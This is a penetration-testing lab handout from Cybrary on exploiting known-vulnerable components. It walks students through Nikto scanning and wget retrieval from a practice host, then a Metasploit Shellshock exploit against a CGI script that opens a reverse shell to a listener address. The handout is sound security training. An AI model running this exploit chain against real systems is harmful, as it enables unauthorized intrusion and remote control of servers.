Module 10 Using Components with Known Vulnerabilities Lab

Description: In this lab, you will identify and exploit a simple example of using components
with known vulnerabilities. We will use a tool called Nikto, normally used in the footprinting
(information gathering) phase of penetration testing, in this lab as well as Metasploit and
wget.
Requirements:​ You will need access to the Cybrary lab environment for this lab.

Step 1:​ Log into Cybrary

Step 2:​ Launch the ​OWASP Using Components with Known Vulnerabilities​ lab by
searching for it in the catalog and selecting the launch button
Note: It may take 30-40 seconds for the lab to launch after clicking the button.
Step 3:​ When the lab opens, you will see a pop-up box. Select the Next button, then Ok to
close the pop-up box.
Step 4:​ You will then be taken to the Kali Linux log in screen.
Step 5:​ Enter a username of ​student ​and a password of ​student ​to log into the desktop.
Step 6:​ Next, launch a Terminal window by clicking the small black box on the left-side
menu.
Step 7:​ Next, type the following command in the Terminal window and press Enter.
nikto -host mutillidae

Note: It might take a minute or two for it to run.

Question 1:​ Was a robots.txt file found? _____________________________________

Step 8:​ Next, we will retrieve the robots.txt file

Step 9:​ Enter the following command at the Terminal prompt and press Enter.
wget mutillidae/robots.txt -O- 2>/dev/null
Note: The O is a capital o and not the number zero.

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 
1 

 
  
 
 

 
Question 2:​ Are there any items not allowed to be indexed by search engines?
______________________________________________________________

Step 10:​ Next, we will retrieve the output from the status.cgi script mentioned in the
robots.txt file.
Step 11:​ Enter the following command at the prompt and press Enter.
wget mutillidae/cgi-bin/status.cgi -O- 2>/dev/null

Question 3:​ Do you see any information about the operating system in use?
___________________________________________________________

Step 12:​ Since we see there is an older Linux OS in use, we are going to attempt to run the
Shellshock exploit against it, since older versions of Linux running this script are normally
vulnerable to this attack.
Step 13:​ Enter this command at the Terminal and press Enter to run Metasploit.
sudo msfconsole

Step 14:​ Next, type this command and press Enter.

search shellshock

Step 15:​ Next, type the following command at the Terminal and press Enter.
use auxiliary/scanner/http/apache_mod_cgi_bash_env

Step 16:​ Next, we can type the info command and press Enter to learn more about the
Metasploit module we are working with.
Step 17:​ Next, type the following commands and press Enter after each one.
set RHOSTS mutillidae
set TARGETURI /cgi-bin/status.cgi

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 
2 

 
  
 
 

 
Step 18:​ Now that we have set our parameters, we can run the tool.
Step 19:​ Type ​run ​and press Enter.
Note: Since we see results from the id command (uid=33, gid=33), we are able to
determine that the server is vulnerable. Now we will use Shellshock to attack the server.
Step 20:​ Type the following command at the Terminal and press Enter.
use exploit/multi/http/apache_mod_cgi_bash_env_exec

Step 21:​ Next, type ​show options​ at the Terminal and press Enter.
Step 22:​ Next, we will set our options for the attack.
Step 23:​ Type the following in the Terminal window and press Enter after each one.
set RHOST mutillidae
set TARGETURI /cgi-bin/status.cgi

Step 24:​ Next, we are going to specify a reverse shell as our payload for this attack.
Step 25:​ At the Terminal, type the following command and press Enter.
set PAYLOAD linux/x86/shell_reverse_tcp

Step 26:​ Next, type ​show options​ and press Enter.

Step 27:​ At the prompt, type the following command and press Enter.
set LHOST 192.168.1.50

Step 28:​ Next, we will finally run our exploit by typing ​run ​in the prompt and pressing Enter.

Question 4:​ Were you successful in opening a command shell? ________________

Step 29:​ Next, type the following command and press Enter, so we can interact with the
background session on the target.
sessions -i -1

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 
3 

 
  
 
 

Step 30:​ Type ​ifconfig​ and press Enter

Step 31:​ Type ​id ​and press Enter

Question 5:​ What output do you see? ______________________________________

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 
4